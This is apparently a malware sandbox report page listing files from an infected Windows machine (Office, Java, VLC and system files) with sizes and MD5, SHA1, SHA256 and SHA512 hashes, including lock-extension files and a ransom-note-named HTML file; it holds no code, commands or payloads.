ae523cbf662366ac4ca552028baf624fd95b5fb31909290141b8fecfd9693f301838ab5575c2ca36d34f2f51f0bdd7ff7343c4fe360bec04c934dfe75380df51

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_OFF.GIF
Filesize
1KB

MD5
d423b8474992ec3ea651ae6d4568d4aa

SHA1
f8151a15d9e8b88176e14c5e946cb89e8da56330

SHA256
f5e35dbcb6af628b354253cc30d2116299091afc6cf3178929503896133f4b80

SHA512
8baae0b89ec0a6efb09b6df2eb616d4b2b9416c4dfd9b419279bc8c0bda5775a341fe0e92438751342f187b62303a7c9f84c58c811ae993b1be6799f63ae9e78

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_ON.GIF
Filesize
1KB

MD5
8609992c6c9e023278818d24266e0d35

SHA1
c597d06680d53bddd61258d222b684f5693dcdb2

SHA256
efd33f951217a710fc6a7bddfca2666d6c5b38c77a7e9e13c22f7bb9d85ec889

SHA512
4bacca2fb6f235191cbb30d79ebad4016d2b0f24da467417ec3b7ee94fab6d557d588c85eef31d98d93cdaa54ea148f8553be9d7cb49019e36fee12cab4002e6

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS.DEV_K_COL.HXK
Filesize
1KB

MD5
64cc85da4b5f4abec0aaceb0606810e4

SHA1
fbe2c5da4d7f25c9698d6c5d1857f99aeb4818e6

SHA256
49e9bdf1eeea07a9946e56e05252fcb3a6e00ec673ba6211f343a4fed977c856

SHA512
100ffaf8455c9d08fb6b23cb6625a385a62f82988c10c9cdecfceb551584e0866a0a81de12c04c866ef9a0e367b1fff8ef144e03d45fb33e47378d68aa3f1fd4

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS_F_COL.HXK
Filesize
1KB

MD5
85a0da64aea242079db3916d9ea33a09

SHA1
d2e2f0a602b81ebc19da897755a0fd05fa28b5c6

SHA256
ddbb4f20942101794fc430566d38e9475df0e890df2a9cbf868ad6d3c86ea063

SHA512
e53a504c97dbe87833232956a2f16fe539349331a1b0251b5a962c760e3319f6da91829a98f06a4dcfbf690f0aeed4250611838c4918ed628935c2855982aade

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD_F_COL.HXK
Filesize
1KB

MD5
bed9c2c7ea0e842a367b9a1dd842cba0

SHA1
855530256c50deb8eaa7e6bafb5b3ea433f3c273

SHA256
a9ebca866d7bc3a812140d729afa5519754130d89a8a3b52bee7ac860bed2dc8

SHA512
563ebcf8d660e1a5d2733b00dfaf834fe51e1bb3fbcac75aef561075b5ca6179efb03c6db3d8cfbdb42bb5492eb1d672ad860978356de8e9ae2ca6c6172e4232

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD_K_COL.HXK
Filesize
1KB

MD5
a64ffbec15de5915923a4b1958715929

SHA1
97a1743de98031b7f7b13024dbdbca481ade2e3b

SHA256
57951470ef9da64d28638c77c32a7494f1ee29e57974a8f6219a06908e4c6ec2

SHA512
09065961b6d184d9314dc95f7ffe5cc19e107098dd12df40f68189b491f9c6ec2db8c617cb42fa897ae328a3bbd46a47d52b62bff8e791c71a4559135abb8b5b

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\SIST02.XSL
Filesize
240KB

MD5
5b9bfa9053513a95075e1151245555b0

SHA1
bb89631cc69b2dafb13261d2f211371e7ac9a802

SHA256
a33abd845b0357e68a3feef912d5954f1cb1db1a42376d56e994bfbe8a119c66

SHA512
06cde1cc397a54f3693a15360e23a91e7309ab28999cf13a4085a962aa42def7acc36c0f078ea95ac8fc1e9e627f5ad4a7f05e0fed8ad9ec7cb0be5c4a5a4fe3

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Biscay\TAB_OFF.GIF
Filesize
1KB

MD5
3c018899c618146cdfcd1b8cb5ef6b84

SHA1
c1be775290d158faac0cbe47662c17dfe636e0e1

SHA256
878d01c308ec1d99d7b8babbe61a0706265aa8d5bd153bf8cef2eb43fdd9b5fd

SHA512
5d3256bb3cd3286df24d645afe1dbc2488a927693747539aa1d3431705d3573a3899bd69c07cfde2dde1b5792dc9681dbc4dcfa448cf839c4835626d9c1b2112

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Biscay\TAB_ON.GIF
Filesize
1KB

MD5
c9850ee1f422aaad3c2c9799c48f1674

SHA1
98b3900d029ff7b1be2bffbd79f146c18812f0a4

SHA256
3cc461519931a5984c5d95c3bb8f715bfe02342b8b6b683b5e90f4328c608e21

SHA512
19575c5320fae195c61898bc899b555e58de393e2bea5d0d38b91e70ed61837a1e35c3d3b3eeded9525f9175a9fb44bc34b6a1e0135bb0c995f5dd80a5bcd10d

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_off.gif
Filesize
1KB

MD5
55ab03dbaaf10eb4d80018a834ca8ab7

SHA1
5e84fd966bc0cccb7aff172d0c116e69e825e733

SHA256
1e7904a21029950412cfbdb2b8246b62685f68b8d4b32e79a514484d9ac5e143

SHA512
b1b8d91a3cfebf47a52c2a60773d6a60cccf68bd2f568df2db545ff4f891747b2cb86189c90cb0095ef0ec4dd37eae57774bca41edc593322f8e34f128e6da35

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_on.gif
Filesize
1KB

MD5
a2c681b3f22e3ef07d07782583cc2e7b

SHA1
974bd311745472620c544c4711ae90f409fdbca5

SHA256
b15b076ef5cadc020d96d3674435dad1e9e66cd0b1bf6f392ad064b6d0e30ad9

SHA512
e5ba6341d893d10d04cae92dc90c1a3089c61172b3a68c63eadd569bbd9680e0fefd0d2d0b5457f3b6270cc7a548cf3ba7279a29ac244a91326e77d0c9d436e9

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\TAB_OFF.GIF
Filesize
2KB

MD5
31d315884f1fdc26b9f13d856ca933c0

SHA1
abab18eb7077840b095bed08975846a30e93c808

SHA256
78f907cbd32069447cf5a581129b344c96aacdaed331f796ea3c234bbd1e5a5d

SHA512
6504378e28e7f8b624ab9b4ef2d318fd4c9090725c2bd26de7363e969deab38713cb7b783ef5d42eed632dc1f2dadb78f1f8e125d26fce23b57b42ded0aba6e5

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\TAB_ON.GIF
Filesize
2KB

MD5
2c5ab6962554015ea19c3e458aa08f2b

SHA1
9d950de5dc382e7d21ca3281b279bb8687d55c5a

SHA256
3c377dd317e5d030016608d0292ce30725777be8e765f561981b4043e50c0347

SHA512
5d88d546e97b25db64301a00518ac1689e99994cd89bd1a7c53463cd9cbbf26d0a62ae1876cd02262ad11ccdd863d16eccfce1beba65c161f5c47a6f4ea624ff

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\LAUNCH.GIF
Filesize
2KB

MD5
4ca2ddd5b8186a1b3687f986aa1aceef

SHA1
a885c87a0d41f173236a4106486754c53aea5556

SHA256
8f24984befed8cb01942874aa64f196a59af07bf7c271a3c36b84fb0ffad6d41

SHA512
bc2679de6dbb2fe35dfd42ad638786aa372031eab3f30fa47a9f2d3173b736e4fc1a72df65db1aef54d0eb283d4e8be686a5fd13d086e3d6d4070b1b58104147

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignleft.gif.savelock52
Filesize
2KB

MD5
605c75af9489bb779e0afad32860b22c

SHA1
a29758952c7c21f17e14fcfbc8282750f8d03223

SHA256
7f990668095ac5de7d6bdd72ae6c70f5ed5230da402c2e18df20ce4ae5f2c7e0

SHA512
c222fff1dad7a44583da377f15fa96cf85f138b55683ea9147211007c532e7ddd177f0af588534d4dd90763303368dfe6a95ea906bc72760eaf1fb7b094c1d8a

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignright.gif
Filesize
2KB

MD5
02844f1523d18df9eacdc80909a8edf3

SHA1
4b98ecafcefe9873455ebb876b96ac3665353266

SHA256
b19ce850989cbebd74570d4444f069e690eebce68058756f00d77bcebbee03ba

SHA512
e35c7a57204f398e4c58f9cf101c6f12a81f05e601a8951dacd6a1fe41289668ab6945a9cd79afaff32ee8c547edff44ac3b538c70125626402b1669ad379264

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_bullets.gif
Filesize
2KB

MD5
3018aa13f7fb930f185a7adf4154c07e

SHA1
d99390fec520bbe05b444a640e8fc7784f08c805

SHA256
7f8d833a042641e899148740fa5e33dc9beabb8fa23d9d8c937d54fca7be4cb3

SHA512
8ff03f76c571042ae77941336772731d11793a7c9cd72eb52ae40d644bc8c2ee0859dde2296783a4ab7123d50cb62603aafba5a1a950a0df5dc3de6fde7c8cad

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_center.gif
Filesize
2KB

MD5
20125feb41ac26040b911ce763f1b150

SHA1
70125bc16faa0e5c358dba1610b41e06222055b3

SHA256
15a0842613bfbab4ac96a6fd8f282bca5d4f61f910e6f856bcafae6ad3f86fcf

SHA512
82b27c8be54553a956d26012bf3244b180f6e09c5a9b702057585c4114b8407dc1ecb6137fa69ffecb57f39ee8baf9ff2d203f6a31b5b503c091801721e340a5

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_decreaseindent.gif
Filesize
2KB

MD5
0f4ff6706d5b4a4bbfed1e1b6fb748a9

SHA1
f3f23f1b8a41439cda5464de4dfc7ef578887078

SHA256
0b5719cd91ea2d53dd204d39f0f2fed5eeae30471067ffb7c914e2c7a6533302

SHA512
c3e6240986c1ebe595c3b83fc05f93eaaa031eb31d998c03cba11d4d7b6cdaca7fa886939eaeff7ee5f62fd83b5169bda4768bd745f2f56379e7a95272dd2e13

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_increaseindent.gif
Filesize
2KB

MD5
87adf9cca8694b6310ec79554a1b86af

SHA1
e152e5d6e0cd7722ee0abaaeeadda731a66c1d7e

SHA256
452cd3cbe7a6c296dde625f4cccbc6c96fa4b2451eacb45fbcbb15980c849185

SHA512
ee3cb11528d45c1dd231f148f0f3a523949123d2035d27150be63ef3f309a8fb5f168bcb8f67e4d95ea6969a07b3560d241f3b7b413228e4c60a986367c7b733

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_justify.gif
Filesize
2KB

MD5
770ef143ecc0c8bfee9fcdf1ddea8039

SHA1
bcfaad945da184abb29053afdbf00cb4fa26a67b

SHA256
a46da86506405a699304834b6a3d994dcea9b1028c06fd5db8b4d30e987e3465

SHA512
bed2ee5faa68f2a431becfb3f73ce10bd697d4dadcdfcb96b64c36c068f521600412ea966c8bdbe5a36db1603f209e6fd78e623baf1a60ef878679baad62063a

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_pressed.gif
Filesize
2KB

MD5
51dd219e8f7b8bff62bb11aea06d439b

SHA1
3a1a518f1cf0d36a319e1af93e463b23a7f81fa9

SHA256
20d5d5b95526c392d149e3bee28c0a6eedda1a8e538834f403af236db02bfbd2

SHA512
0a3b99931b5493c06871987b15b70aa17bbfea86a3d4c9dc1b0f2fde88da5b4806d5f7330d19d1f137d707e6f67d8e7e83722b5fd6490e5614fd2652ab6adbcd

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMV12\Microsoft.Office.InfoPath.xml
Filesize
187KB

MD5
101035a8bac5337771ef6c39576afd2f

SHA1
2fe4ab26a7e1191c27d822a2a2126e386df8a87b

SHA256
646cca6f187992b6c3c018eca51fc97b099ec422fd638675fe58dee7a898d145

SHA512
2001bea5788d501471481d04fd3c9bf9f24adc0cff476247476158b5df74c72bf8a21cd13b390328773113f513210ac59849d85caf511ac51f346ac5a82e5c87

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\TALK21.COM.XML
Filesize
2KB

MD5
3ae4ea217451b7d0a15370ea32bd8069

SHA1
8836d7f4a7230e8b02dec701c6127c5df61417a8

SHA256
26cdb9366723ce26bf847dbc3847f66b496caa7f287923d8ab5b17322bce3cc1

SHA512
dafcbb82c4e87c6ff593412e2f5be0b2b37f12075dffb43d6342833f09e4697aeb61c5abf27d0e6db014fb4b2e848ad44246e73f96ba829937bee5b0cbb6d526

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.XML
Filesize
2KB

MD5
a3e06b8aa5e0b5748767bdf3a038f317

SHA1
e3fd1d36163c75bd11a646a11f5ea095f4e289d3

SHA256
3e9e32e0eeef0f360a5f1e8a912d9f93ef8281c7d719ac7c3ca7b58781f0a9a0

SHA512
79808b4c63f2a8278de544e6dcf4580247cb5763ab1107d864300817f339367fb4aaef0f9f221e86f1acd60cd216ed00c1f8cc36c4d0b78c68fd9266fba9b530

Download Submit
C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl
Filesize
7KB

MD5
2e8c999fbe2d98bcbd56845a8c23ded9

SHA1
2b1b236debc8c5e459ef58e13a8f623063f3bf7d

SHA256
061245f7a2b97494d781293866c0b4ea3fa3a38195b7194898ec69165c6aabb2

SHA512
e25febb8774351777dfee9bafc1295a91abcc8a4be8b47209b0483c04ab24bf480a6a6a6d98ec435d87b93a8529b194c18f9dc0dfcf2a7aa799b536071b94381

Download Submit
C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo
Filesize
7KB

MD5
51e2a9fd97136f733eca57d1f6cd5df7

SHA1
adef7b915612cb25bb31fb490300033d5e986b67

SHA256
618b8b548b7e1592a49b1b65f4ad77b117b368a23db55231f9638f3722fddfe2

SHA512
3cfeb1247f2feb40cc512ea45690c12c3c16417776dcb89517f58d72d22fb5e65c4bc6ce7beb7035776317c7df22ae6d4b2040d3e6fabaf1b171f7094a2939b8

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif
Filesize
1KB

MD5
2b7602d035c66cad780111523b907ac9

SHA1
ab657cba07155b155c295aa08860e270f9a18919

SHA256
7fac8b3942c89acaad4b9772196c52847f2809c86a74bce8a87f1c91c524ed4b

SHA512
47965ec62b9c7aea6b57821fceafbf1ccc5ca401df1973e945520379ee0b9e9d69a8fd1637020f25377910452173a0f9edbe70b0cbb8682e9dbe90a7e8057da8

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UTC
Filesize
1KB

MD5
6f0a962e3922eb6d3b9adf83bcd1e3f9

SHA1
24f2bc45c7a52cc3a49faedebb6e34c851c4937c

SHA256
8db86d23188bbb1cf310d17c4c71eecad731403695d3a61d5361fd5c60c258c3

SHA512
679a1951284305c90782fcb2c39bc034fbc7210dc30b959b8e9b41ab7329e9b3eddb18020cc58b5f0479f6c1347d7b3716db28fdbb85d08e0acb41fd4a432e8b

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html
Filesize
13KB

MD5
d69aebd2fc785b7aa3d609bab1638471

SHA1
c397a6fa407122363825a154ad58bce3c2270ba9

SHA256
9c3aa7ffb6d43fd6d0ae133effce1c4ef15b7dcb88251ebf1ae4692f71e94f12

SHA512
1cc1fab88ec6207f8e376a610f848e07f8ebd6371c2bc02458c60ef5fecd00ec02d0ea7d11469cb1391918ca0d4ff4cd50f0bab7600ae184e29412d0c1980ad1

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html
Filesize
10KB

MD5
6b9998d9aa18f73098efe47116b20199

SHA1
3a20a94d188fff3fabfc6ea2d6fcc528d93724c9

SHA256
a3d2f280e1e1432074c3582708938d39b8497167c6cce32260a8c1072feb0ab2

SHA512
8cd1e421e320f199e8dcc7fa8ebb9d60c918fe1b215928b912721270b2264e61a3840050ba396f8009780b8627f755e961977dc5f1728df862222a4dc9761f33

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf
Filesize
1KB

MD5
fff06a9cdf234710e9b65523d51f91a5

SHA1
6d62e283a81576c0e33428629e245d17f895ce81

SHA256
382ba91d1e22ecc25f34cdf3c61e60f2541caa8f3737ecdf1812ee21c30e0ac0

SHA512
9cd8762c339fad45360e3152b664fe50849160f234611acfa9993dda72dabefcad1a26390da7da39041ff62b0d78a213c9b772b15bb57a6830c97a68f0775bb0

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA
Filesize
9KB

MD5
11126f8501d2c381954831dfdf98ad17

SHA1
2c3a0dfa56081a475d5585798800eae9a9ed80b8

SHA256
b79723d6e86e3c31932d57c18d773c2f327844c9144830da8656077f9f9196a0

SHA512
55b63b59137c71ecbe2d905cd35d8916d3ce7ce9366f8e54d266ce3ec1e028122998ef8440231fb972339a10149cba47561e062a5c700f3d688b5ca03a7fdbb6

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt
Filesize
12KB

MD5
d801f4eb3950b70f7eaff2bfecf547fc

SHA1
83a1ac0ef3b55f0a35b70ba8bcebd05f783958f6

SHA256
d13ada53d4a96425cee591598f27bfb8eba0f27c63c48f6cdaa8725c3161c110

SHA512
e317244ebc65c06b1cdf965f23a1563d8d70dc82f96edbd45b146e891a23a4fe7816508261c23895f3c5e6c185c5350c294e3167f5a040b231093cac7baada69

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA
Filesize
9KB

MD5
86265d58f27220f953aff7e2f0f0516f

SHA1
f299410bc6473cf2a89cfe5c0561eb25c7ad119b

SHA256
5b4596f741e5929d21878c1a259609aa95fe8a0d05e9a6614fc1774fc044403d

SHA512
bcbe76e482eddd8047af73c4d755a064e3cb5ef657a17b269f249b267091a51f63e6e83ba774a8d042c89133a06e4fc30d22879f0db342f1341abf2cc7af684d

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF
Filesize
1KB

MD5
2650eed9b099ec7c30b17adea0fbb34b

SHA1
8fef7576b2654c997e29ec053fecc345c606f9bf

SHA256
02018b78991e2b3481f752f04250172138f962eeb3f2a4c18a365422d3b9d8fe

SHA512
4d6925918cfc8c871c84d545697f5748a7cd9c1e042acfaf3680fce70e18b1741973944644b140fb408fd8be721780be93aa0a4eca722c4e64013a9babb3b6e9

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-core-execution.xml_hidden
Filesize
1KB

MD5
ab34aad1d92289c4ff9783977b8ce878

SHA1
2621bbfcd760b61bd3b713e9fa1a238cccb32f69

SHA256
2844b1b241c0cd681ada1cb6594d6a3db68464bd569a5ac97c9c345cbd792f07

SHA512
7e10a9533b20be78558854ba8df7f0f7d66806736b8a2d20cb02cd217b13b9e41c2bd9568642d37c9a8dc479c09d0e7bad343be0fa55246c448d0e6e3c338f8e

Download Submit
C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyNoDrop32x32.gif
Filesize
1KB

MD5
fed367a1243529a4b1a8144d5bc357a1

SHA1
c4936cf597aa935af79670e1f8f6e6ff91dda757

SHA256
12bf9cee9a2680f00d4f693e466c3453fc8267a8cc9755ef75d96e975e936a8d

SHA512
77263f4f05325aa276a65f81ad70e89c3ef1bc348cf1e54ff6a5ff69b2f9a9c3dd0d5463d543987b5713e0a8b83c65bc4cec9889c840b9c81d05a2a19f0305ac

Download Submit
C:\Program Files\Java\jre7\lib\zi\Etc\UCT
Filesize
1KB

MD5
06d291dbf4d3b24e98a2dc040a0943f7

SHA1
ea6cead7a374af65e44ae7b13819231617f1cd29

SHA256
ebe4f6087d3ce91de3b4fdcd3bc5b8a027e9a5d497f48823565f989dcf2c675f

SHA512
8366b0a5bda1a062d4eed1fa2b9c6c41089fcbbe6a927cd48f7f2f253b53318556f39376af27b42befd73d8df9b15208e3db9db59fa8af69ca7ec98541591ce0

Download Submit
C:\Program Files\Java\jre7\lib\zi\SystemV\EST5
Filesize
1KB

MD5
433018db14631f80b7edac0a16d36362

SHA1
07ec4317dfc6e65c69bcc33c1099e8d909c63ef0

SHA256
7dbdd1c6adff0877c36b11376f719a333c7807f7ff13c9948526c332d8c11157

SHA512
8926a02b1d4169e757d5a36ef35c675198448bbf0fa412ef003dd627ef0d5542e08d7f530c99dff97b73fc216d72c25135381f76856739a9e89cd0848f13e56f

Download Submit
C:\Program Files\Java\jre7\lib\zi\SystemV\HST10
Filesize
1KB

MD5
2152c9cc0d953042ff0a03dc5bf0a8fe

SHA1
291fc0e64f773816ba150da7febce4f86a40573c

SHA256
e5ed7a623d8a1d29c54c9f02bffa90cb519e41dcbfe5215893d1a535b5c864f3

SHA512
e7c927438522fb3a33b3486f8852dcb75b0207381212fc3dc2b144994beccaf8f4566f2c65d47f90e070c2cf0ea4f815ea48d93e49a9689337eea6c9894eaa33

Download Submit
C:\Program Files\Java\jre7\lib\zi\SystemV\MST7
Filesize
1KB

MD5
7fbd796345d634b5c8b4f33d3fcce392

SHA1
8e35f69603d030499f886a340ea8d9fe75d031e0

SHA256
34fb1e6fa1e820490034f21d1ac1976ae32b2edc579d4720d8cd2b4b52d5a0a1

SHA512
523246268be666dee3d4e965e9caf14716a663b584640b0d2c7e34c84b8e96d6436e990aee93ea835b7ad2195eafd4cad16413b4106bf8f3d01c6dd9c131ea1e

Download Submit
C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo
Filesize
609KB

MD5
be68fc8845756580e4c2f8f30b702ba1

SHA1
3b8d372e7d0a650dec788a6473619b6d9e3de985

SHA256
c79ff6ec68729556fe6cce342e079ab411413f3f3986a9cdcc2a68f3e8dcb00a

SHA512
f4a6a89a8fdabe3c9814ad765740e64f143d8f4b30d463f4a1515d1cb1b68328fad02a161297ba4c5be79113bc396af61a11a6b152e511470e7264618a9ce262

Download Submit
C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo
Filesize
785KB

MD5
37ee6c47668e9d449b0a6b22d88b4e43

SHA1
a8897f42432f143d76474f8f834affb06d607fa8

SHA256
bbb5974d71b24d058de9834d488dbf9263cc87f3432b5a999af8c0ae90caebe6

SHA512
2604e67975731ce6550dc4f2713964e27a002849f6647e865a638d3b34d79cb39beaa07bed61585031858918ef87c87e51c5bb78de5deef005558f928460405f

Download Submit
C:\ProgramData\Microsoft Help\Hx_1033_MValidator.Lck
Filesize
1KB

MD5
16b50bed87d7ef719284c6137f9b728d

SHA1
9fc1be5b4fad027462d36dbc76b8040e7d0ad407

SHA256
160df022c84ad566164b7ae51feb1e77965f74d71bae16950e55db0882d34557

SHA512
0683abb6b736f934e30e2b8fddbdb269019146385328b4ac9ea3aa4d84c7bd769fc9592304104f7b6aa6f4ded129c9dc903ea86615b3f2935e14833ee6b2d957

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_MValidator.Lck
Filesize
1KB

MD5
41f986d5e0de90b0181f1b710eec82c8

SHA1
3f5f67f55b8101bcc60e96fc9b51005fc5acb086

SHA256
9169fa9b64cd7910faf9b6f07df4848d55f5c5e7456a2058eaf9120aae35ce8b

SHA512
86408a26075d15a9eec2e4782f1f74e50023d6b1ff6cdd64919e3fdad76f289313310c97d13b3269b486509fc5a0fcd2ea0ddb719887ef84de8eea28986b7467

Download Submit
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.002.savelock52
Filesize
1KB

MD5
256a15b505fa214ff0f272a99950d685

SHA1
4728e9305f6ce7727b87212044ad4d9cb9e6e097

SHA256
3d33de1dc904b5871d1dc00653c964e77abf1a4fdd0cf9c6aeaa3ff4b0f998a5

SHA512
3cf6df71c6c76a403fdd4fe1c8521c6b558f0b30cdf54cc33d0e748064601647f5dcdda849fc1fa709317bc5cd4a972c5c417efc7efbddf8044fe2cd5ec59d76

Download Submit
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.000
Filesize
1KB

MD5
2f36e31b2847a3b71d2f3fcae2127f3c

SHA1
27983055f3fe8d9851c5127f201f40f4a34af377

SHA256
7a4b0e1bda193ef2af096fb40da2cab0141cbc3b37f82bde531935f53bf3b7c0

SHA512
35101320a669c17b6f323ec2982f50a70f0cb751035689cbe4f621e1ff85eadc96230536c35d7b0abb500436583861f9bcc4e2b6c610fb86733cef417df3c332

Download Submit
C:\ProgramData\Package Cache\{7DAD0258-515C-3DD4-8964-BD714199E0F7}v12.0.40660\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi
Filesize
30KB

MD5
ae6afea353023d766a5668cb95d94f5d

SHA1
fe55dd687457bb6e80a9c5d3c2c7f100b9f7368c

SHA256
05cf7f74d29eef5d0265d92c4e1a501fafeb1b1438398f789ac9e1a05f123277

SHA512
c470deea77b8441776a3ebe848903f27d11abb410bd904d55f710138c8798cc7eeeb30fd20f2ab7f523675ec324ee7be69f12eaca0d4effa8bdc9579e976c761

Download Submit
\Device\HarddiskVolume1\Boot\hu-HU\How_to_back_files.html
Filesize
4KB

MD5
7df3ccab2ebe176a63bbba964b16f0c9

SHA1
eaab2ed5bded5d5ccba512742e0f225393fa5cef

SHA256
61266cbbae3ec277e3c94fe16172cb3a5696c3588c619ae5c697ba1addbcc177

SHA512
e207cbd7f73072627e7cc12fbf8ec22f25f139ace74a7c9abe798776df015d663dcd5aa4c2fce4c3ddec7f58898e2dd5fbca1254e6179a8dbb202f7c109f93fa

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads